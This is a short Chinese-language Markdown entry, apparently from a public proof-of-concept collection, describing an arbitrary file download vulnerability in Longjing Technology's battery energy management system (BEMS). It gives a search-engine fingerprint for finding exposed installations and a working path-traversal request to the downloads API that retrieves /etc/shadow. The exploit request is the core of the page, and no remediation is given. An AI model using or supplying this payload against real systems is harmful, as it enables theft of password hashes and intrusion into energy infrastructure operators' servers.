Awesome-POC/Web应用漏洞/龙璟科技 电池能量BEMS downloads 任意文件下载漏洞.md
2024-11-06 14:10:36 +08:00

31 lines
486 B
Markdown

# 龙璟科技 电池能量BEMS downloads 任意文件下载漏洞
## 漏洞描述
龙璟科技 电池能量BEMS 存在接口可任意文件下载获取服务器任意文件信息
## 漏洞影响
```
龙璟科技 电池能量BEMS
```
## 网络测绘
```
title=电池能量管理系统 BEMS
```
## 漏洞复现
登陆页面
![img](images/202202101906850.png)
验证POC
```plain
/api/downloads?fileName=../../../../../../../../etc/shadow
```
![img](images/202202101906628.png)